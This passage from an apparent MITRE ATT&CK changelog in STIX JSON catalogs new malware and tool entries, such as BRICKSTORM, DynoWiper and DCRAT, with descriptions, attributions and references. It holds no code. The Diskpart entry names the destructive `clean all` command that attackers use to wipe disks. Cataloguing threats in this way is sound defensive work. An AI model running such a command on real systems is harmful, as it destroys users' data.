                        "description": "Adversaries may spoof or manipulate security tool user interfaces (UIs) to falsely indicate tools are functioning normally and delay detection and response. \n\nAdversaries may present misleading or falsified security tool interfaces (UIs) that display normal or healthy status indicators, even when underlying security tools have been disabled, degraded, or otherwise tampered with. Security tools typically provide visibility into system health, alerting, and operational status; by misrepresenting this information, adversaries can undermine defender trust in these signals and obscure the true security posture of the system. \n\nThis behavior is often used in conjunction with efforts to disable or modify tools, where adversaries first impair the functionality of defenses (e.g., EDR, logging agents) and then replace or mimic their interfaces to conceal the loss of visibility. By maintaining the appearance of normal operations, such as showing active protection, successful updates, or absence of threats, adversaries can delay investigation and response, enabling continued malicious activity. \n\nFor example, adversaries may display a fake Windows Security interface or system tray icon indicating a \u201cprotected\u201d or \u201chealthy\u201d state after disabling Windows Defender or related services.(Citation: BlackBasta)",
                        "kill_chain_phases": [
                            {
                                "kill_chain_name": "mitre-attack",
                                "phase_name": "defense-impairment"
                            }
                        ],
                        "revoked": false,
                        "external_references": [
                            {
                                "source_name": "mitre-attack",
                                "url": "https://attack.mitre.org/techniques/T1685/003",
                                "external_id": "T1685.003"
                            },
                            {
                                "source_name": "BlackBasta",
                                "description": "Antonio Cocomazzi and Antonio Pirozzi. (2022, November 3). Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor. Retrieved March 14, 2023.",
                                "url": "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/"
                            }
                        ],
                        "object_marking_refs": [
                            "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                        ],
                        "x_mitre_attack_spec_version": "3.3.0",
                        "x_mitre_contributors": [
                            "Menachem Goldstein"
                        ],
                        "x_mitre_deprecated": false,
                        "x_mitre_domains": [
                            "enterprise-attack"
                        ],
                        "x_mitre_is_subtechnique": true,
                        "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                        "x_mitre_platforms": [
                            "Linux",
                            "macOS",
                            "Windows"
                        ],
                        "x_mitre_version": "1.0"
                    }
                }
            ],
            "deprecations": [],
            "deletions": []
        },
        "software": {
            "additions": [
                {
                    "type": "malware",
                    "id": "malware--c21edbd1-a0a4-4c3c-9b22-4a49634186c3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-19 15:09:46.460000+00:00",
                    "modified": "2026-04-24 02:34:13.607000+00:00",
                    "name": "ANELLDR",
                    "description": "[ANELLDR](https://attack.mitre.org/software/S9027), a loader that has been in use since at least 2018, was designed to decrypt and execute [UPPERCUT](https://attack.mitre.org/software/S0275) in memory. [ANELLDR](https://attack.mitre.org/software/S9027) can use anti-analysis techniques and is known to share code overlap with [HiddenFace](https://attack.mitre.org/software/S9023).(Citation: Trend Micro Earth Kasha Anel NOV 2024)(Citation: ESET MirrorFace 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9027",
                            "external_id": "S9027"
                        },
                        {
                            "source_name": "ESET MirrorFace 2025",
                            "description": " Dominik Breitenbacher. (2025, March 18). Operation AkaiRy\u016b: MirrorFace invites Europe to Expo 2025 and revives ANEL backdoor. Retrieved May 22, 2025.",
                            "url": "https://www.welivesecurity.com/en/eset-research/operation-akairyu-mirrorface-invites-europe-expo-2025-revives-anel-backdoor/"
                        },
                        {
                            "source_name": "Trend Micro Earth Kasha Anel NOV 2024",
                            "description": "Hiroaki, H. (2024, November 26). Guess Who\u2019s Back - The Return of ANEL in the Recent Earth Kasha Spear-phishing Campaign in 2024. Retrieved April 17, 2026.",
                            "url": "https://www.trendmicro.com/en_us/research/24/k/return-of-anel-in-the-recent-earth-kasha-spearphishing-campaign.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "ANELLDR"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Contributor: Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--bb6f2a5c-dbc9-45b0-bd3f-a0b7849959c2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 14:04:02.153000+00:00",
                    "modified": "2026-04-20 14:04:58.202000+00:00",
                    "name": "AshTag",
                    "description": "[AshTag](https://attack.mitre.org/software/S9031) is a modular .NET backdoor with multiple features that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2025. [AshTag](https://attack.mitre.org/software/S9031) is designed for persistence and remote command execution and can masquerade as a legitimate VisualServer utility.(Citation: Palo Alto Ashen Lepus DEC 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9031",
                            "external_id": "S9031"
                        },
                        {
                            "source_name": "Palo Alto Ashen Lepus DEC 2025",
                            "description": "Unit 42. (2025, December 11). Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite. Retrieved April 20, 2026.",
                            "url": "https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "AshTag"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--0450ed20-e9a7-4799-b601-2f2710300796",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 17:34:09.075000+00:00",
                    "modified": "2026-04-23 03:13:35.645000+00:00",
                    "name": "BRICKSTORM",
                    "description": "[BRICKSTORM](https://attack.mitre.org/software/S9015) is a cross-platform backdoor with variants written in Go and Rust that facilitates command and control, the ingress transfer of other malware, and the exfiltration of data.(Citation: CISA BRICKSTORM UNC5221 AR25-338A February 2026)(Citation: Picus Security BRICKSTORM UNC5221 October 2025)(Citation: Resecurity UNC5221 BRICKSTORM F5 Big-IP October 2025)(Citation: Google BRICKSTORM September 2025) [BRICKSTORM](https://attack.mitre.org/software/S9015) has also been created from a .NET application using ahead-of-time (AOT) compilation to blend in within victim environments.(Citation: CISA BRICKSTORM UNC5221 AR25-338A February 2026)   [BRICKSTORM](https://attack.mitre.org/software/S9015) was first observed in April 2024.(Citation: Google UNC5221 BRICKSTORM SPAWNCHIMERA April 2024) [BRICKSTORM](https://attack.mitre.org/software/S9015) has previously been leveraged by People's Republic of China (PRC) state-nexus actors identified as UNC6201, UNC5221, WARP PANDA, PunyToad, and SYLVANITE.(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)(Citation: CrowdStrike BRICKSTORM WARP PANDA UNC5221 December 2025)(Citation: CISA BRICKSTORM UNC5221 AR25-338A February 2026)(Citation: Dragos SYLVANITE MuddyWater Electrum March 2026)(Citation: NVISO BRICKSTORM April 2025)(Citation: Google BRICKSTORM GRIMBOLT UNC5221 UNC6201 February 2026)(Citation: Resecurity UNC5221 BRICKSTORM F5 Big-IP October 2025)(Citation: Google BRICKSTORM September 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9015",
                            "external_id": "S9015"
                        },
                        {
                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
                            "url": "https://blog.cloudflare.com/2026-threat-report/"
                        },
                        {
                            "source_name": "CrowdStrike BRICKSTORM WARP PANDA UNC5221 December 2025",
                            "description": "CrowdStrike. (2025, December 4). Unveiling WARP PANDA: A New Sophisticated China-Nexus Adversary. Retrieved April 16, 2026.",
                            "url": "https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/"
                        },
                        {
                            "source_name": "CISA BRICKSTORM UNC5221 AR25-338A February 2026",
                            "description": "DHS/CISA. (2026, February 11). AR25-338A: BRICKSTORM Backdoor. Retrieved April 16, 2026.",
                            "url": "https://www.cisa.gov/news-events/analysis-reports/ar25-338a"
                        },
                        {
                            "source_name": "Dragos SYLVANITE MuddyWater Electrum March 2026",
                            "description": "Dragos. (2026, March 24). Dragos 2026 OT Cybersecurity Report: Year in Review, O&G and Petrochemicals Focus. Retrieved April 17, 2026.",
                            "url": "https://hub.dragos.com/hubfs/2026_YIR_ExecutiveBriefing%20O_G.pdf?hsLang=en"
                        },
                        {
                            "source_name": "Picus Security BRICKSTORM UNC5221 October 2025",
                            "description": "Huseyin Can Yuceel. (2025, October 1). BRICKSTORM Malware: UNC5221 Targets Tech and Legal Sectors in the United States. Retrieved April 16, 2026.",
                            "url": "https://www.picussecurity.com/resource/blog/brickstorm-malware-unc5221-targets-tech-and-legal-sectors-in-the-united-states"
                        },
                        {
                            "source_name": "Google UNC5221 BRICKSTORM SPAWNCHIMERA April 2024",
                            "description": "Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Crew, Billy Wong, Tyler McLellan. (2024, April 4). Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies. Retrieved April 16, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement"
                        },
                        {
                            "source_name": "NVISO BRICKSTORM April 2025",
                            "description": "NVISO Incident Response. (2025, April 1). BRICKSTORM  Backdoor Analysis: A Persistent Espionage Threat  to European Industries. Retrieved April 16, 2026.",
                            "url": "https://blog.nviso.eu/wp-content/uploads/2025/04/NVISO-BRICKSTORM-Report.pdf"
                        },
                        {
                            "source_name": "Google BRICKSTORM GRIMBOLT UNC5221 UNC6201 February 2026",
                            "description": "Peter Ukhanov, Daniel Sislo, Nick Harbour, John Scarbrough, Fernando Tomlinson Jr., Rich Reece. (2026, February 17). From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day. Retrieved April 16, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day"
                        },
                        {
                            "source_name": "Resecurity UNC5221 BRICKSTORM F5 Big-IP October 2025",
                            "description": "Resecurity Threat Intelligence & Incident Analysis. (2025, October 22). F5 BIG-IP Source Code Leak Tied to State-Linked Campaigns Using BRICKSTORM Backdoor. Retrieved April 16, 2026.",
                            "url": "https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor"
                        },
                        {
                            "source_name": "Google BRICKSTORM September 2025",
                            "description": "Sarah Yoder, John Wolfram, Ashley Pearson, Doug Bienstock, Josh Madeley, Josh Murchie, Brad Slaybaugh, Matt Lin, Geoff Carstairs, Austin Larsen. (2025, September 24). Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors. Retrieved April 16, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "BRICKSTORM"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--e110c9c6-7691-4bcb-874d-3d83a63c06c2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-13 14:24:52.519000+00:00",
                    "modified": "2026-04-23 03:07:51.031000+00:00",
                    "name": "BRUSHFIRE",
                    "description": "[BRUSHFIRE](https://attack.mitre.org/software/S9011) is a passive backdoor written in C that executes in-memory within an existing process. First reported in March 2025, [BRUSHFIRE](https://attack.mitre.org/software/S9011) has been observed in activity attributed to People's Republic of China (PRC) state-affiliated threat actors, including UNC5221 and SYLVANITE.(Citation: Dragos SYLVANITE MuddyWater Electrum March 2026)(Citation: Google UNC5221 Ivanti April 2025)(Citation: Picus Security UNC5221 Ivanti May 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9011",
                            "external_id": "S9011"
                        },
                        {
                            "source_name": "Dragos SYLVANITE MuddyWater Electrum March 2026",
                            "description": "Dragos. (2026, March 24). Dragos 2026 OT Cybersecurity Report: Year in Review, O&G and Petrochemicals Focus. Retrieved April 17, 2026.",
                            "url": "https://hub.dragos.com/hubfs/2026_YIR_ExecutiveBriefing%20O_G.pdf?hsLang=en"
                        },
                        {
                            "source_name": "Google UNC5221 Ivanti April 2025",
                            "description": "John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie. (2025, April 3). Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457). Retrieved April 13, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability"
                        },
                        {
                            "source_name": "Picus Security UNC5221 Ivanti May 2025",
                            "description": "Sila Ozeren Hacioglu. (2025, May 5). UNC5221\u2019s Latest Exploit: Weaponizing CVE-2025-22457 in Ivanti Connect Secure. Retrieved April 13, 2026.",
                            "url": "https://www.picussecurity.com/resource/blog/unc5221-cve-2025-22457-ivanti-connect-secure"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "BRUSHFIRE"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--97da6467-c9c5-4eb0-84d4-1234e937e534",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 17:48:45.413000+00:00",
                    "modified": "2026-04-16 17:54:24.028000+00:00",
                    "name": "Caminho",
                    "description": "[Caminho](https://attack.mitre.org/software/S9016) is a downloader that has been used by threat actors since at least 2025 to deliver various strains of malware such as XWorm.(Citation: Zscaler BlindEagle DEC 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9016",
                            "external_id": "S9016"
                        },
                        {
                            "source_name": "VMDetectLoader",
                            "description": "(Citation: Zscaler BlindEagle DEC 2025)"
                        },
                        {
                            "source_name": "Zscaler BlindEagle DEC 2025",
                            "description": "Pellegrino, G. (2025, December 16). BlindEagle Targets Colombian Government Agency with Caminho and DCRAT. Retrieved April 16, 2026.",
                            "url": "https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Caminho",
                        "VMDetectLoader"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--eed7b988-0279-4c4f-bfa9-d81f5444a04b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-02-06 21:22:59.796000+00:00",
                    "modified": "2026-04-23 03:24:47.669000+00:00",
                    "name": "Crocodilus",
                    "description": "[Crocodilus](https://attack.mitre.org/software/S9004) is an Android banking Trojan that was discovered in March 2025. [Crocodilus](https://attack.mitre.org/software/S9004) targeted users worldwide, including Turkey, Poland, Argentina, Brazil, Spain, the United States, Indonesia and India. [Crocodilus](https://attack.mitre.org/software/S9004) has been customized based on the target location. For example, [Crocodilus](https://attack.mitre.org/software/S9004) mimicked major Turkish and Spanish banks for users in Turkey and Spain, while users in Poland saw Facebook advertisements that promoted [Crocodilus](https://attack.mitre.org/software/S9004) to claim bonus points.(Citation: ThreatFabric_Crocodilus_March2025)(Citation: ThreatFabric_Crocodilus_June2025) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9004",
                            "external_id": "S9004"
                        },
                        {
                            "source_name": "ThreatFabric_Crocodilus_June2025",
                            "description": "ThreatFabric. (2025, June 3). Crocodilus Mobile Malware: Evolving Fast, Going Global. Retrieved November 24, 2025.",
                            "url": "https://www.threatfabric.com/blogs/crocodilus-mobile-malware-evolving-fast-going-global"
                        },
                        {
                            "source_name": "ThreatFabric_Crocodilus_March2025",
                            "description": "ThreatFabric. (2025, March 28). Exposing Crocodilus: New Device Takeover Malware Targeting Android Devices. Retrieved November 24, 2025.",
                            "url": "https://www.threatfabric.com/blogs/exposing-crocodilus-new-device-takeover-malware-targeting-android-devices"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Crocodilus"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Liran Ravich, CardinalOps"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "tool",
                    "id": "tool--2f481072-e9f8-4452-be00-d1d7e43c2edc",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 18:23:44.020000+00:00",
                    "modified": "2026-04-16 18:27:09.265000+00:00",
                    "name": "DCRAT",
                    "description": "[DCRAT](https://attack.mitre.org/software/S9017) is a variant of the open-source [AsyncRAT](https://attack.mitre.org/software/S1087) developed in C# with additional capabilities such as patching Microsoft\u2019s Antimalware Scan Interface (AMSI).(Citation: Zscaler BlindEagle DEC 2025)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9017",
                            "external_id": "S9017"
                        },
                        {
                            "source_name": "Zscaler BlindEagle DEC 2025",
                            "description": "Pellegrino, G. (2025, December 16). BlindEagle Targets Colombian Government Agency with Caminho and DCRAT. Retrieved April 16, 2026.",
                            "url": "https://www.zscaler.com/blogs/security-research/blindeagle-targets-colombian-government-agency-caminho-and-dcrat"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "DCRAT"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--eddb863e-fc77-41c1-86e9-5210d6d58b88",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-17 16:31:22.126000+00:00",
                    "modified": "2026-04-24 02:30:38.822000+00:00",
                    "name": "DOWNIISSA",
                    "description": "[DOWNIISSA](https://attack.mitre.org/software/S9021) is a shellcode downloader that has been used by [MirrorFace](https://attack.mitre.org/groups/G1054) since at least 2022 to deploy payloads, including the [LODEINFO](https://attack.mitre.org/software/S9020) backdoor.(Citation: Kaspersky LODEINFO OCT 2022)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9021",
                            "external_id": "S9021"
                        },
                        {
                            "source_name": "Kaspersky LODEINFO OCT 2022",
                            "description": "Ishimaru, S. (2022, October 31). APT10: Tracking down LODEINFO 2022, part I. Retrieved April 17, 2026.",
                            "url": "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "DOWNIISSA"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dominik Breitenbacher, ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--e9c72c02-b55a-4852-b2eb-c7031d215414",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 13:25:25.776000+00:00",
                    "modified": "2026-04-23 03:09:34.005000+00:00",
                    "name": "DRYHOOK",
                    "description": "[DRYHOOK](https://attack.mitre.org/software/S9013) is Python script used to steal credentials. [DRYHOOK](https://attack.mitre.org/software/S9013) was first reported in January 2025, and has previously been leveraged by People's Republic of China (PRC) state-affiliated threat actors identified as UNC5221 and SYLVANITE.(Citation: Dragos SYLVANITE MuddyWater Electrum March 2026)(Citation: Google UNC5221 Ivanti January 2025)(Citation: Picus Security UNC5221 Ivanti May 2025)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9013",
                            "external_id": "S9013"
                        },
                        {
                            "source_name": "Dragos SYLVANITE MuddyWater Electrum March 2026",
                            "description": "Dragos. (2026, March 24). Dragos 2026 OT Cybersecurity Report: Year in Review, O&G and Petrochemicals Focus. Retrieved April 17, 2026.",
                            "url": "https://hub.dragos.com/hubfs/2026_YIR_ExecutiveBriefing%20O_G.pdf?hsLang=en"
                        },
                        {
                            "source_name": "Google UNC5221 Ivanti January 2025",
                            "description": "John Wolfram, Josh Murchie, Matt Lin, Daniel Ainsworth, Robert Wallace, Dimiter Andonov, Dhanesh Kizhakkinan, Jacob Thompson. (2025, January 8). Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation. Retrieved April 14, 2026.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day"
                        },
                        {
                            "source_name": "Picus Security UNC5221 Ivanti May 2025",
                            "description": "Sila Ozeren Hacioglu. (2025, May 5). UNC5221\u2019s Latest Exploit: Weaponizing CVE-2025-22457 in Ivanti Connect Secure. Retrieved April 13, 2026.",
                            "url": "https://www.picussecurity.com/resource/blog/unc5221-cve-2025-22457-ivanti-connect-secure"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "DRYHOOK"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "tool",
                    "id": "tool--080f872e-f1a3-4d42-bb00-9eb55949f6a9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-01-26 18:36:33.410000+00:00",
                    "modified": "2026-04-23 02:11:05.517000+00:00",
                    "name": "Diskpart",
                    "description": "[Diskpart](https://attack.mitre.org/software/S9002) is a Windows command-line utility that is used to manage the computer\u2019s drives, which includes disks, partitions, volumes and virtual hard disks.(Citation: Microsoft_diskpart_Feb2023)  \n\nAdversaries may abuse [Diskpart](https://attack.mitre.org/software/S9002) to perform discovery and destructive actions on a system\u2019s storage. For example, adversaries have been observed using [Diskpart](https://attack.mitre.org/software/S9002) to conduct [Discovery](https://attack.mitre.org/tactics/TA0007) techniques to enumerate disks and volumes to gather information about the host environment, and to execute commands such as `clean all` to remove partition information and overwrite data across disks, resulting in data destruction.(Citation: Trendmicro_RansomHub_Dec2024)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9002",
                            "external_id": "S9002"
                        },
                        {
                            "source_name": "Microsoft_diskpart_Feb2023",
                            "description": "Microsoft. (2023, February 3). diskpart. Retrieved March 17, 2025.",
                            "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskpart"
                        },
                        {
                            "source_name": "Trendmicro_RansomHub_Dec2024",
                            "description": "Trend Research. (2024, December 20). RansomHub. Retrieved December 23, 2025.",
                            "url": "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomhub"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Diskpart"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Liran Ravich, CardinalOps"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "malware",
                    "id": "malware--34057cb6-0a56-48a3-92e5-3af1357808da",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 22:09:31.886000+00:00",
                    "modified": "2026-04-23 23:21:34.879000+00:00",
                    "name": "DynoWiper",
                    "description": "[DynoWiper](https://attack.mitre.org/software/S9038) is a destructive malware associated with the [2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063) in December of 2025. [DynoWiper](https://attack.mitre.org/software/S9038) is a native Windows binary that is distributed by a PowerShell script and overwrites files using data generated by the Mersenne Twister algorithm before they are deleted from the system. Multiple variants of [DynoWiper](https://attack.mitre.org/software/S9038) have been identified, with the primary differences being that one variant shuts down the system after completing its destructive operations, and another introduces a time delay between file overwriting and deletion.(Citation: CERT Polska)(Citation: ESET DynoWiper Update JAN 2026)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S9038",
                            "external_id": "S9038"
                        },
                        {
                            "source_name": "CERT Polska",
                            "description": "CERT Polska. (2026, January 30). Energy Sector Incident  Report \u2013 29 December. Retrieved April 22, 2026.",
                            "url": "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf"
                        },
                        {
                            "source_name": "ESET DynoWiper Update JAN 2026",
                            "description": "ESET. (2026, January 30). DynoWiper update: Technical analysis and attribution. Retrieved April 22, 2026.",
                            "url": "https://www.welivesecurity.com/en/eset-research/dynowiper-update-technical-analysis-attribution/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "DynoWiper"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
